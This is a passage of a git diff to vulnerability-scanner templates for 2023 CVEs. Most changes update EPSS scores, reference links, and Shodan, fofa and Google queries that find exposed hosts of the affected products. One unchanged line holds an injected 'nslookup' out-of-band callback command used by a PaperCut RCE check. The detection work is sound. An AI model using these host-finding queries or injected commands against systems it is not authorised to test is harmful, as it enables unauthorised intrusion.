info: cvss-score: 9.8 cve-id: CVE-2023-24489 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97362 - epss-percentile: 0.99893 + epss-score: 0.9742 + epss-percentile: 0.99933 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server" + fofa-query: title="sharefile storage server" + google-query: intitle:"sharefile storage server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix variables: fileName: '{{rand_base(8)}}' diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index a29dc98497..41b6ab4fec 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24657 cwe-id: CWE-79 - epss-score: 0.03111 - epss-percentile: 0.90058 + epss-score: 0.01878 + epss-percentile: 0.88418 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: phpipam product: phpipam shodan-query: html:"phpIPAM IP address management" + fofa-query: body="phpipam ip address management" tags: cve2023,cve,xss,phpipam,authenticated http: diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index f6b110e77e..69d9f78a53 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24733 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39455 + epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: sigb product: pmb shodan-query: http.favicon.hash:1469328760 + fofa-query: body="pmb group" tags: cve,cve2023,unauth,xss,pmb,pmb_project http: diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index d04f3ed161..9c5546ff00 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24735 cwe-id: CWE-601 - epss-score: 0.00947 - epss-percentile: 0.8279 + epss-score: 0.0116 + epss-percentile: 0.84859 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: sigb product: pmb shodan-query: http.favicon.hash:1469328760 + fofa-query: body="pmb group" tags: cve2023,cve,redirect,pmb,pmb_project http: diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 91572fef17..daf4ce9c0e 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24737 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39455 + epss-score: 0.00099 + epss-percentile: 0.41025 cpe: cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: sigb product: pmb shodan-query: http.favicon.hash:1469328760 + fofa-query: body="pmb group" tags: cve2023,cve,xss,pmb,pmb_project http: diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 5cc676336d..c412ab515a 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -11,13 +11,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe + - https://github.com/Marco-zcl/POC + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2479 cwe-id: CWE-78 - epss-score: 0.95882 - epss-percentile: 0.99324 + epss-score: 0.96532 + epss-percentile: 0.99605 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index b5e1f0a9b1..9c196102e7 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-25135 cwe-id: CWE-502 epss-score: 0.71557 - epss-percentile: 0.97978 + epss-percentile: 0.98058 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: vbulletin product: vbulletin shodan-query: http.component:"vBulletin" + fofa-query: body="powered by vbulletin" google-query: intext:"Powered By vBulletin" tags: cve,cve2023,vbulletin,rce diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index fbf7804509..be536f257c 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25157 cwe-id: CWE-89 - epss-score: 0.41862 - epss-percentile: 0.96974 + epss-score: 0.59299 + epss-percentile: 0.97754 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -30,6 +30,8 @@ info: vendor: osgeo product: geoserver shodan-query: title:"geoserver" + fofa-query: title="geoserver" + google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo http: diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index c250daba2a..5bf9e89c79 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 - epss-score: 0.89626 - epss-percentile: 0.98692 + epss-score: 0.96717 + epss-percentile: 0.99653 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: apache product: kafka_connect shodan-query: html:"Apache Druid" + fofa-query: body="apache druid" tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast http: diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 4f7a6a5362..da87fc1444 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -14,13 +14,15 @@ info: - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346 - https://nvd.nist.gov/vuln/detail/CVE-2023-25346 - https://github.com/ChurchCRM/CRM + - https://github.com/10splayaSec/CVE-Disclosures + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-25346 cwe-id: CWE-79 - epss-score: 0.00089 - epss-percentile: 0.37238 + epss-score: 0.00165 + epss-percentile: 0.5311 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 20143feedc..640deeabc5 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -20,14 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2023-25573 cwe-id: CWE-862 - epss-score: 0.03674 - epss-percentile: 0.91517 + epss-score: 0.04496 + epss-percentile: 0.92455 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: metersphere product: metersphere + shodan-query: http.html:"metersphere" fofa-query: body="Metersphere" tags: cve,cve2023,metersphere,lfi variables: diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index d4d53fa150..49f04011f8 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -29,6 +29,7 @@ info: product: ruckus_wireless_admin shodan-query: title:"ruckus wireless" fofa-query: title="ruckus wireless" + google-query: intitle:"ruckus wireless" tags: cve2023,cve,ruckus,rce,kev,ruckuswireless http: diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 6d904ca21a..103c23a2f8 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26035 cwe-id: CWE-862 - epss-score: 0.97003 - epss-percentile: 0.99723 + epss-score: 0.96928 + epss-percentile: 0.99718 cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: zoneminder product: zoneminder shodan-query: html:"ZM - Login" + fofa-query: body="zm - login" tags: cve,cve2023,rce,zoneminder,unauth,packetstorm flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index ed2bac0af9..f61456c077 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26255 cwe-id: CWE-22 - epss-score: 0.15138 - epss-percentile: 0.95663 + epss-score: 0.12537 + epss-percentile: 0.95441 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 @@ -30,6 +30,8 @@ info: product: stagil_navigation framework: jira shodan-query: title:Jira + fofa-query: title=jira + google-query: intitle:jira tags: cve2023,cve,lfi,jira,cms,atlassian,stagil http: diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 953ef7762d..a68539f2c6 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -14,13 +14,15 @@ info: - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md - https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud - https://nvd.nist.gov/vuln/detail/CVE-2023-26256 + - https://github.com/0x7eTeam/CVE-2023-26256 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-26256 cwe-id: CWE-22 - epss-score: 0.00599 - epss-percentile: 0.76089 + epss-score: 0.01419 + epss-percentile: 0.86483 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 @@ -28,6 +30,8 @@ info: product: stagil_navigation framework: jira shodan-query: title:Jira + fofa-query: title=jira + google-query: intitle:jira tags: cve,cve2023,lfi,jira,cms,atlassian,stagil http: diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index e713be332a..cf9c5d8316 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26347 cwe-id: CWE-284 - epss-score: 0.00466 - epss-percentile: 0.74969 + epss-score: 0.00415 + epss-percentile: 0.73972 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,auth-bypass http: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index b6f89d0eb7..d92a6456fc 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -30,6 +30,8 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev http: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index c155f2d5ff..a6e10da7f7 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26469 cwe-id: CWE-22 - epss-score: 0.93768 - epss-percentile: 0.99071 + epss-score: 0.9424 + epss-percentile: 0.99175 cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,8 +30,8 @@ info: vendor: jorani product: jorani shodan-query: http.favicon.hash:-2032163853 + fofa-query: icon_hash=-2032163853 tags: cve2023,cve,jorani,rce,packetstorm - variables: payload: "" header: "{{to_upper(rand_base(12))}}" diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index dd9f940192..163547e3ec 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-26842 cwe-id: CWE-79 - epss-score: 0.00148 - epss-percentile: 0.49853 + epss-score: 0.00169 + epss-percentile: 0.53813 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index bb6939c7ab..7f6d4cbd1e 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-26843 cwe-id: CWE-79 - epss-score: 0.00146 - epss-percentile: 0.49668 + epss-score: 0.00264 + epss-percentile: 0.66076 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 5135678151..cdaa5dd61b 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-27008 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.39906 + epss-score: 0.00133 + epss-percentile: 0.48375 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: atutor product: atutor shodan-query: http.html:"Atutor" + fofa-query: body="atutor" tags: cve,cve2023,xss,atutor http: diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index a2441f835d..e4d40bdf61 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -14,16 +14,16 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27032 cwe-id: CWE-89 - epss-score: 0.00106 - epss-percentile: 0.42495 + epss-score: 0.01979 + epss-percentile: 0.88753 cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:* metadata: + verified: true max-request: 1 vendor: idnovate product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter framework: prestashop shodan-query: http.component:"prestashop" - verified: true tags: cve,cve2023,sqli,prestashop,advancedpopupcreator http: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 8da52852e0..f6edbc4ced 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27034 cwe-id: CWE-89 - epss-score: 0.01365 - epss-percentile: 0.8596 + epss-score: 0.01204 + epss-percentile: 0.85171 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index fdb6f9b40e..1af99d4e59 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27159 cwe-id: CWE-918 - epss-score: 0.00258 - epss-percentile: 0.63515 + epss-score: 0.00418 + epss-percentile: 0.74069 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: appwrite product: appwrite shodan-query: title:"Sign In - Appwrite" + fofa-query: icon_hash=-633108100 + google-query: intitle:"sign in - appwrite" tags: cve2023,cve,appwrite,ssrf,oast http: diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 2b6d4f5c68..36ae3a3da8 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27179 cwe-id: CWE-434 - epss-score: 0.01173 - epss-percentile: 0.83438 + epss-score: 0.02242 + epss-percentile: 0.89545 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 7b63a1626c..e329de37bd 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.00092 - epss-percentile: 0.37956 + epss-percentile: 0.39168 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: opencats product: opencats shodan-query: title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve2023,cve,authenticated,tenable,opencats,redirect http: diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index c539e62af0..e64e29d563 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2732 cwe-id: CWE-288,NVD-CWE-Other - epss-score: 0.22111 - epss-percentile: 0.96037 + epss-score: 0.18921 + epss-percentile: 0.96241 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 0cfc201b3c..a0daffd738 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27350 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97243 - epss-percentile: 0.99812 + epss-score: 0.97107 + epss-percentile: 0.99783 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: papercut product: papercut_mf shodan-query: http.html:"PaperCut" + fofa-query: body="papercut" tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 01e85a8015..1ecb398ce8 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27372 - epss-score: 0.97152 - epss-percentile: 0.99786 + epss-score: 0.97376 + epss-percentile: 0.99905 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -29,6 +29,7 @@ info: vendor: spip product: spip shodan-query: html:"spip.php?page=backend" + fofa-query: body="spip.php?page=backend" tags: cve,cve2023,packetstorm,spip,rce http: diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index d433ff5a11..ea53e69211 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -22,8 +22,8 @@ info: cvss-score: 10 cve-id: CVE-2023-27482 cwe-id: CWE-287 - epss-score: 0.06421 - epss-percentile: 0.93017 + epss-score: 0.03385 + epss-percentile: 0.91419 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: vendor: home-assistant product: home-assistant shodan-query: title:"Home Assistant" + fofa-query: title="home assistant" + google-query: intitle:"home assistant" tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant http: diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 62f3c07e1d..f8ee44170b 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27524 cwe-id: CWE-1188 - epss-score: 0.97224 - epss-percentile: 0.99822 + epss-score: 0.97095 + epss-percentile: 0.99777 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: apache product: superset shodan-query: html:"Apache Superset" + fofa-query: body="apache superset" tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev http: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index b032894442..1219284f81 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 - epss-score: 0.18807 - epss-percentile: 0.96117 + epss-score: 0.16542 + epss-percentile: 0.96007 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 17d60d99f0..1dc64311e0 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27639 cwe-id: CWE-22 - epss-score: 0.04002 - epss-percentile: 0.9185 + epss-score: 0.04552 + epss-percentile: 0.92497 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 2d36abfdb0..1d84f32c3b 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27640 cwe-id: CWE-22 - epss-score: 0.04002 - epss-percentile: 0.9185 + epss-score: 0.04552 + epss-percentile: 0.92497 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index a933b86809..0effd5a03e 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-2766 - https://vuldb.com/?ctiid.229271 - https://vuldb.com/?id.229271 + - https://github.com/Vme18000yuan/FreePOC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2766 cwe-id: CWE-552 - epss-score: 0.05594 - epss-percentile: 0.92514 + epss-score: 0.05996 + epss-percentile: 0.93472 cpe: cpe:2.3:a:weaver:weaver_office_automation:9.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml index 9463639f55..f51c961640 100644 --- a/http/cves/2023/CVE-2023-2779.yaml +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2779 cwe-id: CWE-79 - epss-score: 0.00993 - epss-percentile: 0.8323 + epss-score: 0.0083 + epss-percentile: 0.8196 cpe: cpe:2.3:a:heator:social_share\,_social_login_and_social_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: heator product: social_share\,_social_login_and_social_comments framework: wordpress + shodan-query: http.html:/wp-content/plugins/super-socializer/ + fofa-query: body=/wp-content/plugins/super-socializer/ publicwww-query: "/wp-content/plugins/super-socializer/" tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer,heator diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 7a6e334e77..3a3c9cb5b6 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -14,13 +14,15 @@ info: - https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2780 - https://github.com/mlflow/mlflow/commit/fae77a525dd908c56d6204a4cef1c1c75b4e9857 + - https://github.com/Ostorlab/KEV + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2780 cwe-id: CWE-29 - epss-score: 0.0217 - epss-percentile: 0.88199 + epss-score: 0.04145 + epss-percentile: 0.92175 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 137d883c40..62ad02ec9a 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-27922 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44627 + epss-score: 0.00151 + epss-percentile: 0.51292 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: thenewsletterplugin product: newsletter framework: wordpress + shodan-query: http.html:/wp-content/plugins/newsletter/ + fofa-query: body=/wp-content/plugins/newsletter/ publicwww-query: /wp-content/plugins/newsletter/ tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index be8fddcd78..8c1c66213e 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-2796 cwe-id: CWE-862 - epss-score: 0.06666 - epss-percentile: 0.93671 + epss-score: 0.03205 + epss-percentile: 0.91193 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: framework: wordpress shodan-query: 'vuln:CVE-2023-2796' fofa-query: "wp-content/plugins/eventon/" + publicwww-query: /wp-content/plugins/eventon/ google-query: inurl:"/wp-content/plugins/eventon/" tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 9d5d3d5ce8..761e2db016 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28121 cwe-id: CWE-287 - epss-score: 0.92977 - epss-percentile: 0.9898 + epss-score: 0.94133 + epss-percentile: 0.99162 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: automattic product: woocommerce_payments framework: wordpress + shodan-query: 